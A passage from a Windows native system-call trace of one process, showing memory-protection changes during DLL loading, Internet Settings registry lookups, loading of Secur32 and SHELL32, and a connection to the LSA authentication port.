4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01781 896 NtProtectVirtualMemory (-1, (0x42c113e0), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01782 896 NtProtectVirtualMemory (-1, (0x42c113ec), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01783 896 NtProtectVirtualMemory (-1, (0x42c113ec), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01784 896 NtProtectVirtualMemory (-1, (0x42c113f4), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01785 896 NtProtectVirtualMemory (-1, (0x42c113f4), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01786 896 NtProtectVirtualMemory (-1, (0x42c11410), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01787 896 NtProtectVirtualMemory (-1, (0x42c11410), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01788 896 NtProtectVirtualMemory (-1, (0x42c11424), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01789 896 NtProtectVirtualMemory (-1, (0x42c11424), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01790 896 NtProtectVirtualMemory (-1, (0x42c11428), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01791 896 NtProtectVirtualMemory (-1, (0x42c11428), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01792 896 NtProtectVirtualMemory (-1, (0x42c1142c), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01793 896 NtProtectVirtualMemory (-1, (0x42c1142c), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01794 896 NtProtectVirtualMemory (-1, (0x42c11444), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01795 896 NtProtectVirtualMemory (-1, (0x42c11444), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01796 896 NtProtectVirtualMemory (-1, (0x42c11464), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01797 896 NtProtectVirtualMemory (-1, (0x42c11464), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01798 896 NtProtectVirtualMemory (-1, (0x42c11468), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01799 896 NtProtectVirtualMemory (-1, (0x42c11468), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01800 896 NtProtectVirtualMemory (-1, (0x42c11480), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01801 896 NtProtectVirtualMemory (-1, (0x42c11480), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01802 896 NtProtectVirtualMemory (-1, (0x42c11488), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01803 896 NtProtectVirtualMemory (-1, (0x42c11488), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01804 896 NtProtectVirtualMemory (-1, (0x42c1148c), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01805 896 NtProtectVirtualMemory (-1, (0x42c1148c), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01806 896 NtProtectVirtualMemory (-1, (0x42c11490), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01807 896 NtProtectVirtualMemory (-1, (0x42c11490), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01808 896 NtProtectVirtualMemory (-1, (0x42c1149c), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01809 896 NtProtectVirtualMemory (-1, (0x42c1149c), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01810 896 NtProtectVirtualMemory (-1, (0x42c1157c), 4, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01811 896 NtProtectVirtualMemory (-1, (0x42c1157c), 4, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01812 896 NtProtectVirtualMemory (-1, (0xaf1000), 4, 4, ... (0xaf1000), 4096, 16, ) == 0x0 01813 896 NtProtectVirtualMemory (-1, (0xaf1000), 4, 16, ... (0xaf1000), 4096, 4, ) == 0x0 01814 896 NtProtectVirtualMemory (-1, (0xaf1004), 4, 4, ... (0xaf1000), 4096, 16, ) == 0x0 01815 896 NtProtectVirtualMemory (-1, (0xaf1004), 4, 16, ... (0xaf1000), 4096, 4, ) == 0x0 01816 896 NtProtectVirtualMemory (-1, (0xaf1008), 4, 4, ... (0xaf1000), 4096, 16, ) == 0x0 01817 896 NtProtectVirtualMemory (-1, (0xaf1008), 4, 16, ... (0xaf1000), 4096, 4, ) == 0x0 01818 896 NtProtectVirtualMemory (-1, (0xaf100c), 4, 4, ... (0xaf1000), 4096, 16, ) == 0x0 01819 896 NtProtectVirtualMemory (-1, (0xaf100c), 4, 16, ... (0xaf1000), 4096, 4, ) == 0x0 01820 896 NtProtectVirtualMemory (-1, (0xaf1010), 4, 4, ... (0xaf1000), 4096, 16, ) == 0x0 01821 896 NtProtectVirtualMemory (-1, (0xaf1010), 4, 16, ... (0xaf1000), 4096, 4, ) == 0x0 01822 896 NtProtectVirtualMemory (-1, (0xaf105c), 4, 4, ... (0xaf1000), 4096, 16, ) == 0x0 01823 896 NtProtectVirtualMemory (-1, (0xaf105c), 4, 16, ... (0xaf1000), 4096, 4, ) == 0x0 01824 896 NtProtectVirtualMemory (-1, (0xaf1064), 4, 4, ... (0xaf1000), 4096, 16, ) == 0x0 01825 896 NtProtectVirtualMemory (-1, (0xaf1064), 4, 16, ... (0xaf1000), 4096, 4, ) == 0x0 01826 896 NtProtectVirtualMemory (-1, (0x42991064), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01827 896 NtProtectVirtualMemory (-1, (0x42991064), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01828 896 NtProtectVirtualMemory (-1, (0x42991068), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01829 896 NtProtectVirtualMemory (-1, (0x42991068), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01830 896 NtProtectVirtualMemory (-1, (0x4299106c), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01831 896 NtProtectVirtualMemory (-1, (0x4299106c), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01832 896 NtProtectVirtualMemory (-1, (0x42991078), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01833 896 NtProtectVirtualMemory (-1, (0x42991078), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01834 896 NtProtectVirtualMemory (-1, (0x429910c0), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01835 896 NtProtectVirtualMemory (-1, (0x429910c0), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01836 896 NtProtectVirtualMemory (-1, (0x429910d4), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01837 896 NtProtectVirtualMemory (-1, (0x429910d4), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01838 896 NtProtectVirtualMemory (-1, (0x429910e0), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01839 896 NtProtectVirtualMemory (-1, (0x429910e0), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01840 896 NtProtectVirtualMemory (-1, (0x429910e8), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01841 896 NtProtectVirtualMemory (-1, (0x429910e8), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01842 896 NtProtectVirtualMemory (-1, (0x429910f8), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01843 896 NtProtectVirtualMemory (-1, (0x429910f8), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01844 896 NtProtectVirtualMemory (-1, (0x42991110), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01845 896 NtProtectVirtualMemory (-1, (0x42991110), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01846 896 NtProtectVirtualMemory (-1, (0x42991144), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01847 896 NtProtectVirtualMemory (-1, (0x42991144), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01848 896 NtProtectVirtualMemory (-1, (0x4299114c), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01849 896 NtProtectVirtualMemory (-1, (0x4299114c), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01850 896 NtProtectVirtualMemory (-1, (0x42991174), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01851 896 NtProtectVirtualMemory (-1, (0x42991174), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01852 896 NtProtectVirtualMemory (-1, (0x42991178), 4, 4, ... (0x42991000), 4096, 32, ) == 0x0 01853 896 NtProtectVirtualMemory (-1, (0x42991178), 4, 32, ... (0x42991000), 4096, 4, ) == 0x0 01854 896 NtQueryValueKey (52, (52, "FromCacheTimeout", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01855 896 NtQueryValueKey (52, (52, "SecureProtocols", Partial, 144, ... TitleIdx=0, Type=4, Data="\240\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (52, "SecureProtocols", Partial, 144, ... TitleIdx=0, Type=4, Data="\240\0\0\0"}, 16, ) }, 16, ) == 0x0 01856 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "Software\Policies"}, ... 124, ) }, ... 124, ) == 0x0 01857 896 NtOpenKey (0x20019, {24, 120, 0x40, 0, 0, (0x20019, {24, 120, 0x40, 0, 0, "Software\Policies"}, ... 128, ) }, ... 128, ) == 0x0 01858 896 NtOpenKey (0x20019, {24, 120, 0x40, 0, 0, (0x20019, {24, 120, 0x40, 0, 0, "Software"}, ... 132, ) }, ... 132, ) == 0x0 01859 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "Software"}, ... 136, ) }, ... 136, ) == 0x0 01860 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01861 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01862 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01863 896 NtOpenKey (0x1, {24, 120, 0x40, 0, 0, (0x1, {24, 120, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 140, ) }, ... 140, ) == 0x0 01864 896 NtQueryValueKey (140, (140, "CertificateRevocation", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (140, "CertificateRevocation", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 01865 896 NtClose (140, ... ) == 0x0 01866 896 NtQueryValueKey (52, (52, "DisableKeepAlive", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01867 896 NtQueryValueKey (52, (52, "DisablePassport", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01868 896 NtQueryValueKey (52, (52, "IdnEnabled", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01869 896 NtQueryValueKey (52, (52, "CacheMode", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01870 896 NtQueryValueKey (52, (52, "EnableHttp1_1", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (52, "EnableHttp1_1", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 01871 896 NtQueryValueKey (52, (52, "ProxyHttp1.1", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01872 896 NtQueryValueKey (52, (52, "EnableNegotiate", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (52, "EnableNegotiate", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 01873 896 NtQueryValueKey (52, (52, "DisableBasicOverClearChannel", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01874 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01875 896 NtOpenKey (0x20019, {24, 120, 0x40, 0, 0, (0x20019, {24, 120, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01876 896 NtOpenKey (0x20019, {24, 120, 0x40, 0, 0, (0x20019, {24, 120, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01877 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 140, ) }, ... 140, ) == 0x0 01878 896 NtQueryValueKey (140, (140, "Feature_ClientAuthCertFilter", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01879 896 NtClose (140, ... ) == 0x0 01880 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "Secur32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01881 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\Secur32.dll"}, 1239216, ... ) }, 1239216, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01882 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Secur32.dll"}, 1239216, ... ) }, 1239216, ... ) == 0x0 01883 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\Secur32.dll"}, 5, 96, ... 140, {status=0x0, info=1}, ) }, 5, 96, ... 140, {status=0x0, info=1}, ) == 0x0 01884 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 140, ... 144, ) == 0x0 01885 896 NtQuerySection (144, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 01886 896 NtClose (140, ... ) == 0x0 01887 896 NtMapViewOfSection (144, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77fe0000), 0x0, 69632, ) == 0x0 01888 896 NtClose (144, ... ) == 0x0 01889 896 NtProtectVirtualMemory (-1, (0x77fe1000), 388, 4, ... (0x77fe1000), 4096, 32, ) == 0x0 01890 896 NtProtectVirtualMemory (-1, (0x77fe1000), 4096, 32, ... (0x77fe1000), 4096, 4, ) == 0x0 01891 896 NtFlushInstructionCache (-1, 2013138944, 388, ... ) == 0x0 01892 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Secur32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01893 896 NtCreateSemaphore (0x100003, 0x0, 0, 2147483647, ... 144, ) == 0x0 01894 896 NtCreateSemaphore (0x100003, 0x0, 0, 2147483647, ... 140, ) == 0x0 01895 896 NtProtectVirtualMemory (-1, (0x77fe10c0), 4, 4, ... (0x77fe1000), 4096, 32, ) == 0x0 01896 896 NtProtectVirtualMemory (-1, (0x77fe10c0), 4, 32, ... (0x77fe1000), 4096, 4, ) == 0x0 01897 896 NtProtectVirtualMemory (-1, (0x77fe10e0), 4, 4, ... (0x77fe1000), 4096, 32, ) == 0x0 01898 896 NtProtectVirtualMemory (-1, (0x77fe10e0), 4, 32, ... (0x77fe1000), 4096, 4, ) == 0x0 01899 896 NtProtectVirtualMemory (-1, (0x77fe10ec), 4, 4, ... (0x77fe1000), 4096, 32, ) == 0x0 01900 896 NtProtectVirtualMemory (-1, (0x77fe10ec), 4, 32, ... (0x77fe1000), 4096, 4, ) == 0x0 01901 896 NtProtectVirtualMemory (-1, (0x77fe1104), 4, 4, ... (0x77fe1000), 4096, 32, ) == 0x0 01902 896 NtProtectVirtualMemory (-1, (0x77fe1104), 4, 32, ... (0x77fe1000), 4096, 4, ) == 0x0 01903 896 NtProtectVirtualMemory (-1, (0x77fe1108), 4, 4, ... (0x77fe1000), 4096, 32, ) == 0x0 01904 896 NtProtectVirtualMemory (-1, (0x77fe1108), 4, 32, ... (0x77fe1000), 4096, 4, ) == 0x0 01905 896 NtProtectVirtualMemory (-1, (0x77fe1110), 4, 4, ... (0x77fe1000), 4096, 32, ) == 0x0 01906 896 NtProtectVirtualMemory (-1, (0x77fe1110), 4, 32, ... (0x77fe1000), 4096, 4, ) == 0x0 01907 896 NtProtectVirtualMemory (-1, (0x77fe1118), 4, 4, ... (0x77fe1000), 4096, 32, ) == 0x0 01908 896 NtProtectVirtualMemory (-1, (0x77fe1118), 4, 32, ... (0x77fe1000), 4096, 4, ) == 0x0 01909 896 NtProtectVirtualMemory (-1, (0x77fe111c), 4, 4, ... (0x77fe1000), 4096, 32, ) == 0x0 01910 896 NtProtectVirtualMemory (-1, (0x77fe111c), 4, 32, ... (0x77fe1000), 4096, 4, ) == 0x0 01911 896 NtProtectVirtualMemory (-1, (0x77fe1120), 4, 4, ... (0x77fe1000), 4096, 32, ) == 0x0 01912 896 NtProtectVirtualMemory (-1, (0x77fe1120), 4, 32, ... (0x77fe1000), 4096, 4, ) == 0x0 01913 896 NtOpenEvent (0x1, {24, 0, 0x40, 0, 0, (0x1, {24, 0, 0x40, 0, 0, "\SECURITY\LSA_AUTHENTICATION_INITIALIZED"}, ... 148, ) }, ... 148, ) == 0x0 01914 896 NtQueryEvent (148, Basic, 8, ... {EventType=0,SignalState=1,}, 0x0, ) == 0x0 01915 896 NtClose (148, ... ) == 0x0 01916 896 NtConnectPort ( ("\LsaAuthenticationPort", {12, 2, 1, 0}, 0x0, 0x0, 1241156, 140, ... 148, 0x0, 0x0, 256, 140, ) , {12, 2, 1, 0}, 0x0, 0x0, 1241156, 140, ... 148, 0x0, 0x0, 256, 140, ) == 0x0 01917 896 NtRequestWaitReplyPort (148, {28, 52, new_msg, 0, 0, 0, 0, 0} (148, {28, 52, new_msg, 0, 0, 0, 0, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\353\6\10\2\220\36\24\0" ... {188, 212, reply, 0, 1252, 896, 82397, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\34\0\10\2\220\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0" ) ... {188, 212, reply, 0, 1252, 896, 82397, 0} (148, {28, 52, new_msg, 0, 0, 0, 0, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\353\6\10\2\220\36\24\0" ... {188, 212, reply, 0, 1252, 896, 82397, 0} "\37\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\2\0\1\0\34\0\10\2\220\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0M\0a\0r\0t\0i\0m\0 \0C\0a\0r\0b\0o\0n\0e\0" ) ) == 0x0 01918 896 NtQueryValueKey (52, (52, "SyncMode5", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01919 896 NtOpenKey (0x9, {24, 28, 0x40, 0, 0, (0x9, {24, 28, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 152, ) }, ... 152, ) == 0x0 01920 896 NtQueryValueKey (152, (152, "SessionStartTimeDefaultDeltaSecs", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01921 896 NtClose (152, ... ) == 0x0 01922 896 NtOpenKey (0xf, {24, 28, 0x40, 0, 0, (0xf, {24, 28, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 152, ) }, ... 152, ) == 0x0 01923 896 NtOpenKey (0xf, {24, 120, 0x40, 0, 0, (0xf, {24, 120, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 156, ) }, ... 156, ) == 0x0 01924 896 NtOpenKey (0x9, {24, 120, 0x40, 0, 0, (0x9, {24, 120, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 160, ) }, ... 160, ) == 0x0 01925 896 NtQueryValueKey (160, (160, "Signature", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0l\0i\0e\0n\0t\0 \0U\0r\0l\0C\0a\0c\0h\0e\0 \0M\0M\0F\0 \0V\0e\0r\0 \05\0.\02\0\0\0"}, 68, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (160, "Signature", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0l\0i\0e\0n\0t\0 \0U\0r\0l\0C\0a\0c\0h\0e\0 \0M\0M\0F\0 \0V\0e\0r\0 \05\0.\02\0\0\0"}, 68, ) }, 68, ) == 0x0 01926 896 NtQueryValueKey (160, (160, "Signature", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0l\0i\0e\0n\0t\0 \0U\0r\0l\0C\0a\0c\0h\0e\0 \0M\0M\0F\0 \0V\0e\0r\0 \05\0.\02\0\0\0"}, 68, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (160, "Signature", Partial, 144, ... TitleIdx=0, Type=1, Data="C\0l\0i\0e\0n\0t\0 \0U\0r\0l\0C\0a\0c\0h\0e\0 \0M\0M\0F\0 \0V\0e\0r\0 \05\0.\02\0\0\0"}, 68, ) }, 68, ) == 0x0 01927 896 NtClose (160, ... ) == 0x0 01928 896 NtOpenKey (0xf, {24, 156, 0x40, 0, 0, (0xf, {24, 156, 0x40, 0, 0, "Content"}, ... 160, ) }, ... 160, ) == 0x0 01929 896 NtQueryValueKey (160, (160, "PerUserItem", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01930 896 NtOpenKey (0xf, {24, 152, 0x40, 0, 0, (0xf, {24, 152, 0x40, 0, 0, "Content"}, ... 164, ) }, ... 164, ) == 0x0 01931 896 NtQueryValueKey (164, (164, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (164, "PerUserItem", Partial, 144, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 01932 896 NtClose (164, ... ) == 0x0 01933 896 NtClose (160, ... ) == 0x0 01934 896 NtOpenKey (0xf, {24, 156, 0x40, 0, 0, (0xf, {24, 156, 0x40, 0, 0, "Content"}, ... 160, ) }, ... 160, ) == 0x0 01935 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "SHELL32.dll"}, ... 164, ) }, ... 164, ) == 0x0 01936 896 NtMapViewOfSection (164, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x7c9c0000), 0x0, 8482816, ) == 0x0 01937 896 NtClose (164, ... ) == 0x0 01938 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0 01939 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0 01940 896 NtFlushInstructionCache (-1, 2090602496, 4476, ... ) == 0x0 01941 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0 01942 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0 01943 896 NtFlushInstructionCache (-1, 2090602496, 4476, ... ) == 0x0 01944 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0 01945 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0 01946 896 NtFlushInstructionCache (-1, 2090602496, 4476, ... ) == 0x0 01947 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0 01948 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0 01949 896 NtFlushInstructionCache (-1, 2090602496, 4476, ... ) == 0x0 01950 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0 01951 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0 01952 896 NtFlushInstructionCache (-1, 2090602496, 4476, ... ) == 0x0 01953 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0 01954 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0 01955 896 NtFlushInstructionCache (-1, 2090602496, 4476, ... ) == 0x0 01956 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0 01957 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0 01958 896 NtFlushInstructionCache (-1, 2090602496, 4476, ... ) == 0x0 01959 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 4476, 4, ... (0x7c9c1000), 8192, 32, ) == 0x0 01960 896 NtProtectVirtualMemory (-1, (0x7c9c1000), 8192, 32, ... (0x7c9c1000), 8192, 4, ) == 0x0 01961 896 NtFlushInstructionCache (-1, 2090602496, 4476, ... ) == 0x0 01962 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SHELL32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01963 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SYSTEM\Setup"}, ... 164, ) }, ... 164, ) == 0x0 01964 896 NtQueryValueKey (164, (164, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (164, "SystemSetupInProgress", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 01965 896 NtClose (164, ... ) == 0x0 01966 896 NtQueryDefaultUILanguage (1235812, ... 01967 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01968 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... -2147481368, ) == 0x0 01969 896 NtQueryInformationToken (-2147481368, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01970 896 NtClose (-2147481368, ... ) == 0x0 01971 896 NtOpenKey (0x2000000, {24, 0, 0x640, 0, 0, (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... -2147481368, ) }, ... -2147481368, ) == 0x0 01972 896 NtOpenKey (0x80000000, {24, -2147481368, 0x240, 0, 0, (0x80000000, {24, -2147481368, 0x240, 0, 0, "Software\Policies\Microsoft\Control Panel\Desktop"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01973 896 NtOpenKey (0x80000000, {24, -2147481368, 0x640, 0, 0, (0x80000000, {24, -2147481368, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147481452, 